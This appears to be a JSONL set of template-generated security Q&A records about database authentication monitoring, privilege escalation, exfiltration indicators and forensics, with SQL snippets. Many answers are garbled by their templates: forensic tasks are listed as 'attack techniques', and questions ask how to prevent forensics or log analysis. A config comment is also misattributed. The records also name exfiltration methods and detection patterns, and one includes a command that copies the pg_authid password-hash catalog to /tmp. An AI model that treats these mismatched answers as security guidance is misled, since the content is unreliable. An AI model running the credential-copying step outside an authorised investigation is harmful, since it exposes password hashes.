+{"id": "trtp-0a092a6021dc", "instruction": "What are best practices for preventing Database Authentication Monitoring?", "output": "Security controls and preventive measures for Database Authentication Monitoring:\n\n- Enable authentication logging\n- Alert on failed login thresholds\n- Monitor for unusual patterns\n- Implement account lockout\n- Use SIEM for correlation\n\nAuthentication attacks are often the first stage of database compromise. Monitoring detects brute force, credential stuffing, and unauthorized access. Rapid detection prevents data theft.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-authentication-monitoring", "license": "original", "retrieved_at": "2025-12-17T19:35:42.194683Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.194785Z", "updated_at": "2025-12-17T19:35:42.194785Z"}
+{"id": "trtp-8beeab7ee355", "instruction": "What does Database Authentication Monitoring look like in SQL?", "output": "Example of Database Authentication Monitoring:\n\n```sql\n-- PostgreSQL: failed authentication logging\n-- pg_hba.conf: log all authentication\nlog_connections = on\nlog_disconnections = on\n\n-- SQL Server: login auditing\nCREATE SERVER AUDIT LoginAudit\nTO FILE (FILEPATH = 'C:\\\\Audit\\\\');\nCREATE SERVER AUDIT SPECIFICATION LoginAuditSpec\nFOR SERVER AUDIT LoginAudit\nADD (FAILED_LOGIN_GROUP);\n```", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-authentication-monitoring", "license": "original", "retrieved_at": "2025-12-17T19:35:42.194683Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.194795Z", "updated_at": "2025-12-17T19:35:42.194795Z"}
+{"id": "trtp-154ed3285124", "instruction": "Explain Privilege Escalation Detection from a security perspective.", "output": "Privilege escalation detection identifies attempts to gain higher database permissions than authorized. This includes GRANT statement monitoring, role changes, and exploitation of security vulnerabilities.\n\nSecurity Relevance: Privilege escalation transforms limited access into full database control. Detecting escalation attempts reveals active attacks and compromised accounts. Prevention limits breach impact.", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-privilege-escalation-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.196579Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.196614Z", "updated_at": "2025-12-17T19:35:42.196614Z"}
+{"id": "trtp-42805968eed0", "instruction": "Describe the technical aspects of Privilege Escalation Detection.", "output": "Privilege Escalation Detection consists of the following key components:\n\n- GRANT statement monitoring\n- Role membership changes\n- Privilege usage auditing\n- SECURITY DEFINER exploitation\n- System privilege abuse", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-privilege-escalation-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.196579Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.196634Z", "updated_at": "2025-12-17T19:35:42.196634Z"}
+{"id": "trtp-90141967a251", "instruction": "How can Privilege Escalation Detection lead to database security incidents?", "output": "Privilege escalation transforms limited access into full database control. Detecting escalation attempts reveals active attacks and compromised accounts. Prevention limits breach impact.\n\nCommon attack vectors include:\n- Direct GRANT abuse\n- Role membership manipulation\n- SECURITY DEFINER exploitation\n- Exploiting vulnerable procedures", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-privilege-escalation-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.196579Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.196655Z", "updated_at": "2025-12-17T19:35:42.196655Z"}
+{"id": "trtp-684b93aa9340", "instruction": "How can adversaries exploit Privilege Escalation Detection?", "output": "Attack techniques involving Privilege Escalation Detection:\n\n- Direct GRANT abuse\n- Role membership manipulation\n- SECURITY DEFINER exploitation\n- Exploiting vulnerable procedures\n\nDefenders can detect these attacks by:\n- GRANT/REVOKE statement monitoring\n- Role membership changes\n- Superuser operations", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-privilege-escalation-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.196579Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.196675Z", "updated_at": "2025-12-17T19:35:42.196675Z"}
+{"id": "trtp-7cdb4e3e18ca", "instruction": "What indicators reveal malicious activity involving Privilege Escalation Detection?", "output": "Methods for detecting Privilege Escalation Detection attacks or anomalies:\n\n- GRANT/REVOKE statement monitoring\n- Role membership changes\n- Superuser operations\n- DDL statement auditing\n- Privilege change alerts", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-privilege-escalation-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.196579Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.196687Z", "updated_at": "2025-12-17T19:35:42.196687Z"}
+{"id": "trtp-628544687991", "instruction": "How do you defend against Privilege Escalation Detection attacks?", "output": "Security controls and preventive measures for Privilege Escalation Detection:\n\n- Audit all privilege changes\n- Alert on privilege escalation\n- Regular privilege reviews\n- Restrict GRANT capability\n- Monitor high-privilege operations\n\nPrivilege escalation transforms limited access into full database control. Detecting escalation attempts reveals active attacks and compromised accounts. Prevention limits breach impact.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-privilege-escalation-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.196579Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.196700Z", "updated_at": "2025-12-17T19:35:42.196700Z"}
+{"id": "trtp-9cf1bc551b09", "instruction": "Provide a code example for Privilege Escalation Detection.", "output": "Example of Privilege Escalation Detection:\n\n```sql\n-- PostgreSQL: audit privilege changes\nSELECT * FROM pg_auth_members;\nSELECT * FROM information_schema.role_table_grants;\n\n-- SQL Server: track permission changes\nSELECT * FROM sys.fn_builtin_permissions(DEFAULT)\nWHERE permission_name LIKE '%GRANT%';\n\n-- Monitor for:\n-- GRANT ... WITH GRANT OPTION\n-- ALTER USER ... SUPERUSER\n-- sp_addsrvrolemember\n```", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-privilege-escalation-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.196579Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.196717Z", "updated_at": "2025-12-17T19:35:42.196717Z"}
+{"id": "trtp-9f9c38d3c587", "instruction": "How does Data Exfiltration Indicators work and what are its security implications?", "output": "Data exfiltration from databases leaves indicators including large query results, bulk exports, unusual SELECT patterns, and network traffic anomalies. Detecting exfiltration requires monitoring both database and network layers.\n\nSecurity Relevance: Data exfiltration is the ultimate goal of many database attacks. Detecting exfiltration during or after occurrence is critical for breach response. Large data access should trigger alerts.", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-data-exfiltration-indicators", "license": "original", "retrieved_at": "2025-12-17T19:35:42.198901Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.198953Z", "updated_at": "2025-12-17T19:35:42.198953Z"}
+{"id": "trtp-dc10fca10d2e", "instruction": "Describe the technical aspects of Data Exfiltration Indicators.", "output": "Data Exfiltration Indicators consists of the following key components:\n\n- Query result size monitoring\n- Bulk export detection\n- Network data volume analysis\n- SELECT * patterns\n- Scheduled job data extraction", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-data-exfiltration-indicators", "license": "original", "retrieved_at": "2025-12-17T19:35:42.198901Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.199002Z", "updated_at": "2025-12-17T19:35:42.199002Z"}
+{"id": "trtp-e68fe6c895af", "instruction": "Why is Data Exfiltration Indicators important for database security?", "output": "Data exfiltration is the ultimate goal of many database attacks. Detecting exfiltration during or after occurrence is critical for breach response. Large data access should trigger alerts.\n\nCommon attack vectors include:\n- Bulk SELECT for data theft\n- OUT-OF-BAND exfiltration via HTTP\n- DNS exfiltration of data\n- Export to file and retrieve", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-data-exfiltration-indicators", "license": "original", "retrieved_at": "2025-12-17T19:35:42.198901Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.199048Z", "updated_at": "2025-12-17T19:35:42.199048Z"}
+{"id": "trtp-0376ba9e9844", "instruction": "What are common attack techniques involving Data Exfiltration Indicators?", "output": "Attack techniques involving Data Exfiltration Indicators:\n\n- Bulk SELECT for data theft\n- OUT-OF-BAND exfiltration via HTTP\n- DNS exfiltration of data\n- Export to file and retrieve\n\nDefenders can detect these attacks by:\n- Large query result sets\n- Bulk data access patterns\n- Export operations (INTO OUTFILE)", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-data-exfiltration-indicators", "license": "original", "retrieved_at": "2025-12-17T19:35:42.198901Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.199087Z", "updated_at": "2025-12-17T19:35:42.199087Z"}
+{"id": "trtp-c2878cc5b940", "instruction": "What log entries indicate Data Exfiltration Indicators attacks?", "output": "Methods for detecting Data Exfiltration Indicators attacks or anomalies:\n\n- Large query result sets\n- Bulk data access patterns\n- Export operations (INTO OUTFILE)\n- Unusual network traffic from DB\n- pg_dump/mysqldump execution", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-data-exfiltration-indicators", "license": "original", "retrieved_at": "2025-12-17T19:35:42.198901Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.199102Z", "updated_at": "2025-12-17T19:35:42.199102Z"}
+{"id": "trtp-bf24a407a6b5", "instruction": "How do you defend against Data Exfiltration Indicators attacks?", "output": "Security controls and preventive measures for Data Exfiltration Indicators:\n\n- Monitor query result sizes\n- Alert on bulk data access\n- Track export operations\n- Network traffic analysis\n- DLP integration\n\nData exfiltration is the ultimate goal of many database attacks. Detecting exfiltration during or after occurrence is critical for breach response. Large data access should trigger alerts.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-data-exfiltration-indicators", "license": "original", "retrieved_at": "2025-12-17T19:35:42.198901Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.199115Z", "updated_at": "2025-12-17T19:35:42.199115Z"}
+{"id": "trtp-c62d45cd13e6", "instruction": "What is the syntax for Data Exfiltration Indicators?", "output": "Example of Data Exfiltration Indicators:\n\n```sql\n-- Monitor large query results:\n-- PostgreSQL pg_stat_statements:\nSELECT query, rows, calls \nFROM pg_stat_statements \nWHERE rows > 10000 \nORDER BY rows DESC;\n\n-- Alert indicators:\n-- SELECT * FROM large_table\n-- Multiple UNION SELECT queries\n-- INTO OUTFILE operations\n-- pg_dump/mysqldump execution\n```", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-data-exfiltration-indicators", "license": "original", "retrieved_at": "2025-12-17T19:35:42.198901Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.199133Z", "updated_at": "2025-12-17T19:35:42.199133Z"}
+{"id": "trtp-fa5082ae2e71", "instruction": "How does Database Forensics Fundamentals work and what are its security implications?", "output": "Database forensics involves collecting and analyzing evidence from database systems after security incidents. Key sources include logs, transaction history, file system artifacts, and memory analysis.\n\nSecurity Relevance: Database forensics determines breach scope, attack methods, and data accessed. Proper evidence handling supports legal proceedings. Understanding forensic artifacts enables better detection.", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-forensics-fundamentals", "license": "original", "retrieved_at": "2025-12-17T19:35:42.201526Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.201557Z", "updated_at": "2025-12-17T19:35:42.201557Z"}
+{"id": "trtp-a906595a31fa", "instruction": "What are the key components of Database Forensics Fundamentals?", "output": "Database Forensics Fundamentals consists of the following key components:\n\n- Log collection and preservation\n- Transaction log analysis\n- Query history reconstruction\n- Timeline creation\n- Evidence preservation", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-forensics-fundamentals", "license": "original", "retrieved_at": "2025-12-17T19:35:42.201526Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.201577Z", "updated_at": "2025-12-17T19:35:42.201577Z"}
+{"id": "trtp-be1d4ba85fb9", "instruction": "From a security perspective, why should defenders understand Database Forensics Fundamentals?", "output": "Database forensics determines breach scope, attack methods, and data accessed. Proper evidence handling supports legal proceedings. Understanding forensic artifacts enables better detection.\n\nCommon attack vectors include:\n- Reconstructing attacker actions\n- Identifying data accessed\n- Determining initial compromise\n- Tracking lateral movement", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-forensics-fundamentals", "license": "original", "retrieved_at": "2025-12-17T19:35:42.201526Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.201599Z", "updated_at": "2025-12-17T19:35:42.201599Z"}
+{"id": "trtp-07118c0b0c33", "instruction": "How can adversaries exploit Database Forensics Fundamentals?", "output": "Attack techniques involving Database Forensics Fundamentals:\n\n- Reconstructing attacker actions\n- Identifying data accessed\n- Determining initial compromise\n- Tracking lateral movement\n\nDefenders can detect these attacks by:\n- Forensic artifact locations\n- Log correlation techniques\n- Timeline reconstruction", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-forensics-fundamentals", "license": "original", "retrieved_at": "2025-12-17T19:35:42.201526Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.201613Z", "updated_at": "2025-12-17T19:35:42.201613Z"}
+{"id": "trtp-30f0997f1faf", "instruction": "What indicators reveal malicious activity involving Database Forensics Fundamentals?", "output": "Methods for detecting Database Forensics Fundamentals attacks or anomalies:\n\n- Forensic artifact locations\n- Log correlation techniques\n- Timeline reconstruction\n- Evidence integrity verification\n- Chain of custody maintenance", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-forensics-fundamentals", "license": "original", "retrieved_at": "2025-12-17T19:35:42.201526Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.201625Z", "updated_at": "2025-12-17T19:35:42.201625Z"}
+{"id": "trtp-b3ec57f4c6d2", "instruction": "What preventive measures address Database Forensics Fundamentals vulnerabilities?", "output": "Security controls and preventive measures for Database Forensics Fundamentals:\n\n- Enable comprehensive logging\n- Preserve logs externally\n- Document collection procedures\n- Maintain evidence integrity\n- Regular forensic readiness review\n\nDatabase forensics determines breach scope, attack methods, and data accessed. Proper evidence handling supports legal proceedings. Understanding forensic artifacts enables better detection.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-forensics-fundamentals", "license": "original", "retrieved_at": "2025-12-17T19:35:42.201526Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.201637Z", "updated_at": "2025-12-17T19:35:42.201637Z"}
+{"id": "trtp-bd7d4e7b6397", "instruction": "What does Database Forensics Fundamentals look like in SQL?", "output": "Example of Database Forensics Fundamentals:\n\n```sql\n-- Collect forensic data:\n-- PostgreSQL:\nSELECT * FROM pg_stat_activity;  -- Active sessions\nSELECT * FROM pg_stat_statements;  -- Query history\n\\copy pg_catalog.pg_authid TO '/tmp/authid_backup.csv';\n\n-- SQL Server:\nSELECT * FROM sys.dm_exec_sessions;\nSELECT * FROM sys.dm_exec_query_stats;\nSELECT * FROM fn_dblog(NULL, NULL);  -- Transaction log\n```", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-forensics-fundamentals", "license": "original", "retrieved_at": "2025-12-17T19:35:42.201526Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.201647Z", "updated_at": "2025-12-17T19:35:42.201647Z"}
+{"id": "trtp-cc6e9c7f4928", "instruction": "Describe Transaction Log Analysis and its role in database security.", "output": "Transaction logs record all database modifications and can be analyzed to reconstruct attacker actions. Understanding transaction log structure enables detailed forensic analysis of database compromises.\n\nSecurity Relevance: Transaction logs provide detailed evidence of database modifications. They can reveal exactly what data was accessed, modified, or deleted. Log analysis is essential for incident response.", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-transaction-log-analysis", "license": "original", "retrieved_at": "2025-12-17T19:35:42.203741Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.203773Z", "updated_at": "2025-12-17T19:35:42.203773Z"}
+{"id": "trtp-fee10b4b9389", "instruction": "What elements make up Transaction Log Analysis?", "output": "Transaction Log Analysis consists of the following key components:\n\n- Log structure and contents\n- Log file locations\n- Log parsing tools\n- Change reconstruction\n- Point-in-time analysis", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-transaction-log-analysis", "license": "original", "retrieved_at": "2025-12-17T19:35:42.203741Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.203793Z", "updated_at": "2025-12-17T19:35:42.203793Z"}
+{"id": "trtp-1853d03456f9", "instruction": "How can Transaction Log Analysis lead to database security incidents?", "output": "Transaction logs provide detailed evidence of database modifications. They can reveal exactly what data was accessed, modified, or deleted. Log analysis is essential for incident response.\n\nCommon attack vectors include:\n- Reconstructing data modifications\n- Identifying deleted records\n- Tracking privilege changes\n- Correlating with other evidence", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-transaction-log-analysis", "license": "original", "retrieved_at": "2025-12-17T19:35:42.203741Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.203809Z", "updated_at": "2025-12-17T19:35:42.203809Z"}
+{"id": "trtp-110d0ba1ad7e", "instruction": "What threats are associated with Transaction Log Analysis?", "output": "Attack techniques involving Transaction Log Analysis:\n\n- Reconstructing data modifications\n- Identifying deleted records\n- Tracking privilege changes\n- Correlating with other evidence\n\nDefenders can detect these attacks by:\n- Unusual modification patterns\n- Mass DELETE operations\n- Schema changes", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-transaction-log-analysis", "license": "original", "retrieved_at": "2025-12-17T19:35:42.203741Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.203835Z", "updated_at": "2025-12-17T19:35:42.203835Z"}
+{"id": "trtp-5206925f7f25", "instruction": "What indicators reveal malicious activity involving Transaction Log Analysis?", "output": "Methods for detecting Transaction Log Analysis attacks or anomalies:\n\n- Unusual modification patterns\n- Mass DELETE operations\n- Schema changes\n- Privilege modifications\n- Off-hours activity", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-transaction-log-analysis", "license": "original", "retrieved_at": "2025-12-17T19:35:42.203741Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.203846Z", "updated_at": "2025-12-17T19:35:42.203846Z"}
+{"id": "trtp-38f99fe0cfb0", "instruction": "What are best practices for preventing Transaction Log Analysis?", "output": "Security controls and preventive measures for Transaction Log Analysis:\n\n- Enable transaction logging\n- Archive logs for retention\n- Understand log structure\n- Tools for log analysis\n- Regular log review\n\nTransaction logs provide detailed evidence of database modifications. They can reveal exactly what data was accessed, modified, or deleted. Log analysis is essential for incident response.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-transaction-log-analysis", "license": "original", "retrieved_at": "2025-12-17T19:35:42.203741Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.203858Z", "updated_at": "2025-12-17T19:35:42.203858Z"}
+{"id": "trtp-2744af3fe96b", "instruction": "Show an example of Transaction Log Analysis.", "output": "Example of Transaction Log Analysis:\n\n```sql\n-- SQL Server transaction log analysis:\nSELECT [Current LSN], Operation, Context, [Transaction ID],\n       [Begin Time], [Transaction Name], [Description]\nFROM fn_dblog(NULL, NULL)\nWHERE Operation IN ('LOP_INSERT_ROWS', 'LOP_DELETE_ROWS', 'LOP_MODIFY_ROW');\n\n-- PostgreSQL WAL analysis:\npg_waldump /var/lib/postgresql/14/main/pg_wal/000000010000000000000001\n```", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-transaction-log-analysis", "license": "original", "retrieved_at": "2025-12-17T19:35:42.203741Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.203869Z", "updated_at": "2025-12-17T19:35:42.203869Z"}